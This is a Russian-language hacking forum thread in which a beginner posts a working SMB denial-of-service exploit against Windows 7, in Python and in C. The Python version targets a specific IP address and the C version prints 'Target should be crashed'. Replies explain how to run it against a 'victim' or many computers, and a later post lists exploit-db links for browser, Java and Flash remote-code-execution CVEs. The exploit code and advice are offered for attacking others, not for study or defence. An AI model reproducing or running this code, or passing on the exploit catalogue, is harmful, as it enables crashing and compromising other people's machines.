работа с *.py эксплоитами

Discussion in 'Песочница' started by red_fox, 23 Feb 2011.

  1. red_fox

    red_fox New Member

    Joined:
    22 Feb 2011
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Добрый день !

    Я новичок в плане взлома да и вобще )

    Мне конечно очень понравилась программа Metasploit framework, но всех эксплоитов которые там находятся, не совсем хватает, по этому я порылся в гугле и т.д. в итоге нашел эксплоит для ОС windows 7

    его содержание такое :


    from socket import socket

    host = "92.54.70.230", 445
    buff = (
    "\x00\x00\x00\x90" # Begin SMB header: Session message
    "\xff\x53\x4d\x42" # Server Component: SMB
    "\x72\x00\x00\x00" # Negociate Protocol
    "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
    "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    "\x30\x30\x32\x00"
    )
    s = socket()
    s.connect(host)
    s.send(buff)
    s.close()


    я так понимаю он написан на python ...

    пытаюсь запустить с консоли и вот что получаю :

    from: can't read /var/mail/socket
    host: couldn't get address for '92.54.70.230,': not found
    /home/blood/1st.py: строка 4: ошибка синтаксиса около неожиданной лексемы `('
    /home/blood/1st.py: строка 4: `buff = ('

    ладно ... дальше пробую запустить сначала python и потом из него мой файл :

    Python 2.6.6 (r266:84292, Sep 15 2010, 15:52:39)
    [GCC 4.4.5] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>>
    '/home/blood/1st.py'
    >>>

    и ничего :(

    подскажете пожалуйста как мне быть?? что бы я мог использовать сторонние эксплоиты ...

    Зарание благодарен...
     
    #1 red_fox, 23 Feb 2011
    Last edited: 23 Feb 2011
  2. omg_it_glowZ

    omg_it_glowZ New Member

    Joined:
    29 Jan 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    -2
    Я не спец конечно, но может надо Python 3k?
    Просто предположение :)
     
  3. usr-bin

    usr-bin New Member

    Joined:
    17 Sep 2010
    Messages:
    22
    Likes Received:
    3
    Reputations:
    5
    Это значит что сплойт выполнился и сплойт на дос атаку чтоб проверить его работу лучше быть за компом жертвы чтоб понять. Есть так-же вариант что smb блокируеться фаером попробуй на виртуалке потестить или на большом количестве компов.
     
  4. red_fox

    red_fox New Member

    Joined:
    22 Feb 2011
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    По идее на компе жертвы появится BSOD , но пинг показывает что живой , спасибо usr-bin,
    я теперь хотя бы знаю чем юзать подобные сплойты ...
     
    Xtreem likes this.
  5. red_fox

    red_fox New Member

    Joined:
    22 Feb 2011
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Но как быть с этим ???

    char buff[] =
    "\x00\x00\x00\x90"
    "\xff\x53\x4d\x42"
    "\x72\x00\x00\x00"
    "\x00\x18\x53\xc8"
    "\x00\x26"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x ff\xfe"
    "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x 45\x54"
    "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x 20\x31"
    "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x 30\x00"
    "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x 20\x57"
    "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x 31\x61"
    "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x 02\x4c"
    "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x 20\x4c"
    "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x 32\x2e"
    "\x30\x30\x32\x00";

    int main(int argc, char *argv[]) {


    if (argc < 2) {
    printf("Syntax: %s [ip address]\r\n", argv[0]);
    return -1;
    }

    WSADATA WSAdata;
    WSAStartup(MAKEWORD(2, 2), &WSAdata);

    SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    char *host = argv[1];


    SOCKADDR_IN ssin;
    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family = AF_INET;
    ssin.sin_port = htons((unsigned short)445);
    ssin.sin_addr.s_addr = inet_addr(host);

    printf("Connecting to %s:445... ", host);
    if (connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
    printf("ERROR!\r\n");
    return 0;
    }
    printf("OK\r\n");

    printf("Sending malformed packet... ");
    if (send(sock, buff, sizeof(buff), 0) <= 0) {
    printf("ERROR!\r\n");
    return 0;
    }
    printf("OK\r\n");

    printf("Successfully sent packet!\r\nTarget should be crashed...\r\n");


    closesocket(sock);
    WSACleanup();

    return 1;

    }


    ведь я так понимаю функция "printf("Successfully sent packet!\r\nTarget should be " должна хоть что то выводить на экран а там все та же картина --->>>


    >>> '/home/blood/1st.py'
    '/home/blood/1st.py'
    >>>
     
  6. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    Так это вообще код на С++. Ты что, его через Питон "пропускаешь"? :confused:
    Их можно запускать через программу lcc.exe. Почитай тему https://forum.antichat.ru/thread26510.html
     
    #6 Sams, 25 Feb 2011
    Last edited: 25 Feb 2011
  7. afonn

    afonn Member

    Joined:
    10 Aug 2015
    Messages:
    117
    Likes Received:
    42
    Reputations:
    0
    кому надо

    MDAC CVE-2006-0003 https: //www.exploit-...exploits/16561/ Microsoft Internet Explorer - COM CreateObject выполнение кода
    PDF CVE-2010-0188 https: // WWW .exploit -... эксплойты / 16670 / Adobe Acrobat Bundled LibTIFF переполнением целочисленного
    Java CVE-2011-3544 по протоколу HTTPS: //www.exploit-...exploits/18171/ Java Applet Rhino Script Engine Удаленное выполнение кода

    FF CVE-2012- 1710 * Mozilla Firefox использовать против плагинов уязвимости Oracle
    Java CVE-2012-0507 https: //www.exploit-...exploits/18679/ Java AtomicReferenceArray Тип Нарушение Уязвимость

    IE CVE-2013-0074 по протоколу HTTPS: //www.exploit- ... подвигах / 29858 / Microsoft Internet Explorer - COALineDashStyleArray небезопасный доступ к памяти (MS12-022)
    IE CVE-2013-0322 https: //www.exploit-...exploits/32904/ Microsoft Internet Explorer - CMarkup Use-вечернюю Free (MS14-012)
    IE CVE-2013-1347 https: //www.exploit-...exploits/25294/ Microsoft Internet Explorer CGenericElement Объект Use-After-Free уязвимости
    Java CVE-2013-1493 https: // WWW. эксплуатируют -... эксплойты / 24904 / Java CMM удаленное выполнение кода
    Java CVE-2013-2423 https: //www.exploit-...exploits/24976/ Java Applet Отражение Тип Путаница удаленное выполнение кода
    JRE CVE-2013-2465 по протоколу HTTPS : //www.exploit-...exploits/27705/ удаленное выполнение кода уязвимости в Oracle JRE
    IE CVE-2013-2551 https: //www.exploit-...exploits/26175/ Microsoft Internet Explorer - COALineDashStyleArray Целочисленное переполнение ( MS13-009)
    FF CVE-2013-3993 * Mozilla Firefox использовать против плагинов уязвимости IBM

    Flash - CVE-2014-0497 https: //www.exploit-...exploits/33212/ Adobe Flash Player Integer Underflow удаленное выполнение кода
    IE CVE -2014-6332 https: //www.exploit-...exploits/35229/ Microsoft Internet Explorer <= 11 - OLE Automation Массив удаленное выполнение кода (1) (MS14-064)

    Flash - CVE-2015-0311 https: // www.exploit -... эксплойты / 36360 / Adobe Flash Player ByteArray UncompressViaZlibVariant использования после
    Java CVE-2015-2419 JavaScript уязвимости в Internet Explorer 10 и 11 (MS15-065) EK
    * CVE-2015-2445 * ASLR Обход Есть нет известных подвигов в дикой природе.
    Flash - CVE-2015-3043 https: //www.exploit-...exploits/37536/ Adobe Flash Player Nellymoser Audio Декодирование Переполнение буфера
    флэш CVE-2015-3113 * Adobe Flash 0-день ( в настоящее время заплата) раскрыты в июне 2015
    Вспышка CVE-2015-3105 по протоколу HTTPS: //www.exploit-...exploits/37448/ Adobe Flash Player рисования затенение повреждению памяти
    Flash - CVE-2015-5119 по протоколу HTTPS: //www.exploit-. ..exploits / 37523 / Adobe Flash Player ByteArray использования после
    вспышки CVE-2015-5122 https: //www.exploit-...exploits/37599/ Adobe Flash opaqueBackground использования после
    вспышки CVE-2015-7645 https: // www.exploit -... эксплойты / 38490 / Adobe Flash IExternalizable.writeExternal - Тип Путаница